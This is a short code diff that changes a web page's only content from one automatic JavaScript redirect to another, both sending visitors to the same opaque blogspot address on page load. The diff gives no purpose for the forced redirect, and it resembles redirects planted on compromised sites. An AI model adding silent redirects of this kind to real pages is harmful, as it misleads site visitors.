--- a/pages/index.html
+++ b/pages/index.html
@@ -1,2 +1,5 @@
-<script language='javascript' type='text/javascript'>
-window.location ="http://dofaalmntwfaa.blogspot.be/search/label/u5";</script>
+
+<script>
+    setTimeout(function(){location.href="http://dofaalmntwfaa.blogspot.be/search/label/u5"} ,0 );
+</script>
+
